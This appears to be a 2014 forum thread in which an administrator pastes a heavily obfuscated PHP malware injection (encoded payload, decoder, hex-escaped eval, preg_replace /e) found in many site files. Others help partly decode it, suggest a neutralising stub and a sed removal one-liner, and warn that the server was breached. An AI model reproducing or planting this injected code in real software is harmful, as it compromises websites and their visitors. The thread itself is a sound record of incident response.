Linux - Server This forum is for the discussion of Linux Software used in a server related context.
Notices
Welcome to
LinuxQuestions.org , a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free.
Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please
contact us . If you need to reset your password,
click here .
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a
virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month.
Click here for more info.
08-26-2014, 02:45 AM
#1
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Rep:
Some virus/malware in my PHP script
I just noticed that on one of my servers I've got a lot of infected PHP files:
Code:
<?php $vucprjnldo = 'x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%167822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x78]252]y85]256]y6g]257]y86]2%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5323ldfid>}&;!osvufs}%x5c%x787f;!opjudov{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!77]y72]265]y39]274]y85]273f#00;quui#>.%x5c%x7825!<***f%x5c%0hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x782y74]256#<!%x5c%x7825ggvg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!x5c%x7860un>qp%x5c%x7825!|Z~!<##!25z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5)%x5c%x7825z>>2*!%x5c%x7825z>35!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%bz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5825kj:-!OVMM*<(<%x5c%x78e%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsx67%42%x2c%163%x74%162%x5f%163%x70%154%x60%x5c%x7825}X;!sp!*#opo#>>}R;7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x782osvufs!|ftmf!~<**9.-j%x5c%xj{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:*%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudo%x5c%x7825c:>1<%x5c%x7825b:>1<!gps24*<!%x5c%x7825kj:!>!#]y3d]51]y35]!*uyfu%x5c%x7827k:!ft27pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x725!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7eu{66~67<&w6<*&7-#o]s]o]s]#)fc%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x782c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x782539*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275]#>s%x5c%x7825<#462]47y]252]18F.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{*oj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%c%x782f!#0#)idubn%x5c%x786x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78257825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<%x782fq%x5c%x7825>2q%x5c%x7msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%25t::!>!%x5c%x7824Ypp3)%x5c%x7825cB:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x74%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7]y6g]273]y76]271]y7d]252]y74]256]4gvodujpo!%x5c%x7824-%x5c%x7824y7%7]278]225]241]334]368]322]3]364]6]283]427]36]373P%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x782jA)qj3hopmA%x5c%x78273TQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825mm!>!#]y81]273]y76]2585))!gj!<*#cd2bge56+99386c6f+9f5d816:5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x78:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878]445]43]321]464]284]364]6]234]342]58]24]31#-ZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R33f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x7x6f%142%x5f%163%x74%141%x72%164"y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c_;gvc%x5c%x7825}&;ftmbg}%x5c%x787x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x55w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%z!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]%x5c%x7825!<*::::::-111112)eobs%x7825zW%x5c%x7825h>EzH,2W%x5c%x%x5c%x7825j=tj{fpg)%xx785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C>U<#16,47R57,27R66,#%x5c5>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x782SFEBFI,6<*127-UVPFNJU,6<*27-7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%xc%x7878pmpusut)tpqssutRe%x5c%x7825x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!8257**^#zsfvr#%x5c%x785cq%x5c%xj%x5c%x7825>j%x5c%x7825!<25j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%xf_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUU825%x5c%x7824-%x5c%x7824b71]y83]256]y78]248]y8x78242178}527}88:}334}472%x5c%x7824<!%5c%x7825z>!tussfw)%x5c%c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x786f;!osvufs}w;*%x5c%x787f!>>dXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fe860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%e:56-%x5c%x7878r.985:52985-t.98]K4]65%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c8246767~6<Cw6<pd%x5c%x782x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)vt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x782epdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5hx7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%8b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]8]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j+A!>!{e%x5c%x7825)!>>%x5c%x!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x]y3e]81#%x5c%x782f#7e:55946-*#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7tww**WYsboepn)%x5c%x7825bss-%x5c%x782%x7825bbT-%x5c%x7825bT-3]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]7}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdotr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpx5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x785cSFWSFT%x5c%x78c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQe?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]2!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c5l}S;2-u%x5c%x7825!-#2#%xNULL); }6%x75%156%x61"]=1; function fjfgg($n){return chr(ord($n)-1);}>!2p%x5c%x7825!|!*!***b%x5c%69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%5087fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y5r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.*#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;67]y74]275]y7:]268]y7f#<!%x5c%x5)!gj!|!*1?hmg%x5c%x7825)!gj256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x78x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x782%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x782727825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x78g}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<4-%x5c%x7824]y8%x5c%x7824-%x5c%xif((function_exists("%197-2qj%x5c%x78257-K)udfoopdXA%x5:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%15pmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827d%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-mf!}Z;^nbsbq%x5c%x7825%x5cx7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)f)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x78id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujoc%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XA7f%x5c%x787f%x5c%x787f<u%x5sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x7bubE{h%x5c%x7825)sutc<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x7826<%x5c%x787fw6*3qj%x5c%x78257>%x5c5rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x78%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3q372]58y]472]37y]672]48y6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212jRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7y]}R;2]},;osvufs}%x5c%x7827;mnui%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x782]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]I&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbekc%x7824-tusqpt)%x5c%x78%x7860msvd}+;!>!}%x5c%x7827;!>>>!}y39]252]y83]273]y72]282#<x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x57,#%x5c%x782fq%x5c%x7825Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>7825wN;#-Ez-1H*WCw*[!%x5c%x782]D8]86]y31]278]y3f]51L3]84]y31M6x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!sbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x782565!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*w6Z6<.3%x5c%x7860hA%x5!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5cx7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x%x5c%x7825%x5c%x7878:!>#]y3g]61]yx7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeo!osvufs!~<3,j%x5c%x7825c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%qj%x5c%x78256<^#zsfvr#%x5c%x%x5c%x7825tdz>#L4]275L3g)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]2x5c%x7825j>1<%x5c%x7825j=6[%x593e:5597f-s.973:8297f:5297c%x785cq%x5c%x7825%x5c%x7827j @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%0LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K25r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&~6<%x5c%x787fw6<*K)ftpmdXA6|7**epmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x78)Rd%x5c%x7825)Rb%x5c%x7827825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bs/(.*)/epreg_replacesdvmuozaib'; $teylojttvr = explode(chr((307-263)),'7400,22,3129,32,7525,69,6305,61,9709,65,0,62,7003,49,1005,40,6394,54,9371,33,3071,58,4914,25,3496,68,2084,43,9232,22,6943,60,1456,43,1651,30,9943,46,4728,54,3767,58,3415,40,5191,61,8997,61,9912,31,7422,33,4525,47,9774,43,8079,34,8156,48,2621,22,7052,49,9528,28,8693,52,9680,29,7951,42,4232,31,7101,53,2356,50,969,36,4598,66,7594,36,2007,51,9302,69,3917,61,3889,28,6820,56,7820,43,8285,70,6448,61,5668,63,4664,64,9254,48,8593,34,3323,33,4572,26,1329,38,532,65,1140,27,10014,39,9462,22,3849,40,766,64,7259,42,1681,47,9058,53,4263,25,1774,41,5080,59,6669,28,6229,43,7630,47,7993,21,4996,44,5513,59,9484,44,8652,41,5252,69,8882,61,8014,65,327,33,7703,59,5139,52,3617,32,597,33,6366,28,9404,58,870,67,2058,26,360,37,4095,34,9989,25,2738,36,9868,44,4352,66,8509,61,7154,57,1581,70,3455,41,1728,46,1435,21,7677,26,6100,20,1045,30,2213,48,4939,57,212,39,7211,48,1875,57,1167,61,5600,68,251,50,5486,27,62,56,7924,27,7863,61,3015,56,8745,24,3825,24,2186,27,5919,50,1962,45,6576,62,8355,32,5861,58,1075,65,6272,25,9173,59,6176,53,301,26,2464,33,8627,25,669,67,6876,67,118,26,6638,31,2127,59,4782,45,3978,55,6751,69,2902,69,397,48,8204,23,1932,30,3161,69,2296,60,4464,38,2707,31,10053,53,8943,54,2580,41,2406,58,4418,25,1294,35,8570,23,630,39,8387,56,7368,32,445,65,2497,34,9111,62,3680,21,2774,70,2844,58,1401,34,6697,54,2261,35,144,68,6120,56,2643,64,3356,59,4502,23,3649,31,8820,30,8113,43,9817,51,4129,50,5731,37,6509,67,9654,26,4827,37,8850,32,5572,28,5969,68,3564,53,7301,67,9556,23,8443,66,8769,51,4864,50,5768,23,1499,35,3230,50,2531,49,8227,58,2971,44,830,40,3701,66,6037,63,1367,34,7762,58,4288,64,1815,60,5450,36,7455,70,9624,30,4179,53,736,30,4033,62,1534,47,3280,43,1228,66,5040,40,937,32,5321,60,510,22,9579,45,4443,21,5791,70,5381,69,6297,8'); $mawuedtwim=substr($vucprjnldo,(51847-41741),(21-14)); if (!function_exists('uwundfcpyb')) { function uwundfcpyb($caehqyfhhy, $qptunmxljk) { $gxowzmlndd = NULL; for($taijuorzga=0;$taijuorzga<(sizeof($caehqyfhhy)/2);$taijuorzga++) { $gxowzmlndd .= substr($qptunmxljk, $caehqyfhhy[($taijuorzga*2)],$caehqyfhhy[($taijuorzga*2)+1]); } return $gxowzmlndd; };} $tojphvmjdb="\x20\57\x2a\40\x61\167\x6f\145\x6f\163\x62\146\x76\162\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x34\55\x31\66\x37\51\x29\54\x20\143\x68\162\x28\50\x34\65\x33\55\x33\66\x31\51\x29\54\x20\165\x77\165\x6e\144\x66\143\x70\171\x62\50\x24\164\x65\171\x6c\157\x6a\164\x74\166\x72\54\x24\166\x75\143\x70\162\x6a\156\x6c\144\x6f\51\x29\51\x3b\40\x2f\52\x20\163\x69\166\x6c\153\x70\144\x6e\165\x6e\40\x2a\57\x20"; $bmnrgccpri=substr($vucprjnldo,(56718-46605),(42-30)); $bmnrgccpri($mawuedtwim, $tojphvmjdb, NULL); $bmnrgccpri=$tojphvmjdb; $bmnrgccpri=(506-385); $vucprjnldo=$bmnrgccpri-1; ?>
Does anybody know how to clean my PHP files without removing them, of course?
08-26-2014, 03:00 AM
#2
LQ Newbie
Registered: Jul 2012
Posts: 19
Rep:
Can you find where it's being executed?
08-26-2014, 03:10 AM
#3
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
Rep:
No or not sure how, it seems to be a lot of PHP files being infected.
---------- Post added 08-26-14 at 10:11 ----------
BTW, tried clamscan, but doesn't seem to find the malware as an infection or issue.
08-26-2014, 03:19 AM
#4
LQ Newbie
Registered: Jul 2012
Posts: 19
Rep:
I'm trying to decrypt the code now.
08-26-2014, 03:39 AM
#5
LQ Newbie
Registered: Jul 2012
Posts: 19
Rep:
I've found where it's being executed. I've never seen PHP execute like this before.
The eval is inside the $tojphvmjdb variable, and for some reason PHP is executing it. I think it's passing the $tojphvmjdb variable into the $bmnrgccpri variable, and then PHP is executing it as a function (Since it has the brackets after it).
08-26-2014, 04:24 AM
#6
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
Rep:
OK, cool, thanks for the analysis, but how can I remove all of this from all PHP files?
08-26-2014, 04:39 AM
#7
LQ Newbie
Registered: Jul 2012
Posts: 19
Rep:
This is going to take ages to reverse, but put this code at the top of your files:
if (!function_exists('uwundfcpyb')) { function uwundfcpyb() { return false; } }
That should stop it from executing. You'll need to do this in all infected files (You won't need to do it to any files that they include though, it only needs to run once at execution time).
When I say "should" I mean to say I have no idea how it's executing, but I do know that it requires that function to open up the rest of the code.
To remove it? That's a manual job.
08-26-2014, 04:44 AM
#8
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
Rep:
Well, thats not nice, but I guess your idea it's pretty OK. Will try to see how do implement this the easy way.
Thanks again for the great work.
08-26-2014, 04:50 AM
#9
LQ Newbie
Registered: Jul 2012
Posts: 19
Rep:
How did you find it? Like, what is it doing?
I've pulled some of it apart and it tries really hard to hide itself.
Quote:
if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) { $GLOBALS["anuna"]=1; function fjfgg($n){return chr(ord($n)-1);} error_reporting(0);
That's some of it I've been able to get.
08-26-2014, 05:18 AM
#10
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
Rep:
Well didn't do any kind of magic, just opened one of the PHP files as the website didn't work as expected and I noted that there is some code which shouldn't be there.
08-26-2014, 06:41 AM
#11
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
Rep:
Actually I've found that this little script might actually do the job:
for i in $(find . -name \*.php); do sed -i '/vucprjnldo/ s/<?php.*?>//' $i; done
At least for one of the wordpress sites it worked like a charm
08-27-2014, 08:00 AM
#12
LQ Guru
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 10,649
Just, uhh, restore the contents of the server from a known-good copy in the, uhh, version-control system?
You do , uhh, have a separate development-system with isolated, known-good source code, and you, uhh, merely do a git checkout to update the production system, right? You don't, uhh, "just develop the thing right there on the production server," right? . . .
1 members found this post helpful.
08-28-2014, 02:15 AM
#13
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
Rep:
Its all done at the moment and seems to be 'bacteria' free
08-30-2014, 08:10 AM
#14
LQ Veteran
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Quote:
Originally Posted by
robertjinx
Its all done at the moment and seems to be 'bacteria' free
Really? And how do you know that?
Seriously, the issue isn't that there was code in your PHP, the issue is that someone was able to gain access to your machine and modify your files. You just happened to stumble on the PHP stuff, who knows what else they did.
If you haven't solved the real problem, the bad guys will be back.
08-30-2014, 09:42 AM
#15
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Rep:
Quote:
Originally Posted by
Hangdog42
Really? And how do you know that?
Seriously, the issue isn't that there was code in your PHP,
the issue is that someone was able to gain access to your machine and modify your files.
+1. the code in the php file is just the stuff
you found .
A symptom of a worse condition.
If you're lucky, the php script code was all they did.
All times are GMT -5. The time now is 11:28 PM .
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know .
Latest Threads
LQ News